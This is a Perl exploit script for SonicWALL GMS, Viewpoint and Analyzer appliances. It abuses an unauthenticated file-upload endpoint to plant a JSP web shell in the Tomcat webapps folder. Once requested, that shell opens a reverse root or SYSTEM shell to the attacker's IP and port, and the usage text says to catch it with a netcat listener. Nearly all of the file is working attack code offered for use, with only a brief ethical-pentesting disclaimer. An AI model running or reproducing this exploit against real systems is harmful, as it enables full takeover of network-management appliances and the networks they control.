#!/usr/bin/perl

##
#  Title:     SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit 
#  Name:      sgmsRCE.pl
#  Author:    Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
#  Use it only for education or ethical pentesting! The author accepts 
#  no liability for damage caused by this tool.
#  
##


use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;


my %args;
getopt('hlp:', \%args);

my $victim    = $args{h} || usage();
my $lip	      = $args{l}; 
my $lport     = $args{p};
my $detect    = $args{d};
my $shellname = "cbs.jsp";

banner();

my $gms_path;
my $target;
my $sysshell;

my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");

# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');

print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content  => [   num => "123456",
                action => "show_diagnostics",
                task => "search",
		item => "application_log",
		criteria => "*.*",
		width => "500",
        ];

my $result = $agent->request($request);

if ($result->is_success) {
        print "[+] Host looks vulnerable ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}


my @lines=split("\n",$result->content);

foreach my $line (@lines) {
	if ($line =~ /OPTION VALUE=/) {
		my @a=split("\"", $line);
		if ($a[1] =~ m/logs/i) {
			my @b=split(/logs/i,$a[1]);
			$gms_path=$b[0];
		}
                if ($gms_path ne "") {
			print "[+] GMS Path: $gms_path\n";
			last;
                } else {
			next;
                }
	}
}
if ($gms_path eq "") {
	print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
	exit(0);
}


if ($gms_path =~ m/^\//) {
	$target="UNX";
	$gms_path=$gms_path."Tomcat/webapps/appliance/";
	$sysshell="/bin/sh";
	print "[+] Target ist Unix...\n";
} else {
	$target="WIN";
	$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
	$sysshell="cmd.exe";
	print "[+] Target ist Windows...\n";
}

&_writing_shell;

if (!$detect) {
print "[+] Uploading shell ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content	 => [ 	action => "file_system", 
		task => "uploadFile", 
		searchFolder => "$gms_path", 
		uploadFileName => ["$shellname"]
	];

my $result = $agent->request($request);

if ($result->is_success) {
	print "[+] Upload completed ...\n";
} else {
	print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}

unlink("$shellname");

print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");

if ($result->is_success) {
        print "[+] Have fun ...\n";
} else {
        print "[-] Error while connecting ... $result->status_line\n";
	exit(0);
}
}

sub _writing_shell {
	open FILE, ">", "$shellname" or die $!;
        print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
        class StreamConnector extends Thread
        {
                InputStream is;
                OutputStream os;

                StreamConnector( InputStream is, OutputStream os )
                {
                        this.is = is;
                        this.os = os;
                }
                public void run()
                {
                        BufferedReader in  = null;
                        BufferedWriter out = null;
                        try
                        {
                                in  = new BufferedReader( new InputStreamReader( this.is ) );
                                out = new BufferedWriter( new OutputStreamWriter( this.os ) );
                                char buffer[] = new char[8192];
                                int length;
                                while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
                                {
                                        out.write( buffer, 0, length );
                                        out.flush();
                                }
                        } catch( Exception e ){}
                        try
                        {
                                if( in != null )
                                        in.close();
                                if( out != null )
                                        out.close();
                        } catch( Exception e ){}
                }
        }
        try
        {
                Socket socket = new Socket( "$lip", $lport );
                Process process = Runtime.getRuntime().exec( "$sysshell" );
                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
        } catch( Exception e ) {}
%>

EOF

close(FILE);
}

sub usage {
    print "\n";
    print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
    print "====================================================================\n\n";
    print "  Usage:\n";
    print "           $0 -h <http://victim> -l <yourip> -p <yourport>\n";
    print "  Notes:\n";
    print "           Start your netcat listener <nc -lp 4444>\n";
    print "           -d only checks if the Host is vulnerable\n";
    print "\n";
    print "  Author:\n";
    print "           Nikolas Sotiriu (lofi)\n";
    print "           url: www.sotiriu.de\n";
    print "           mail: lofi[at]sotiriu.de\n";
    print "\n";


    exit(1);
}

sub banner {
        print STDERR << "EOF";
--------------------------------------------------------------------------------
       SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
--------------------------------------------------------------------------------

EOF
}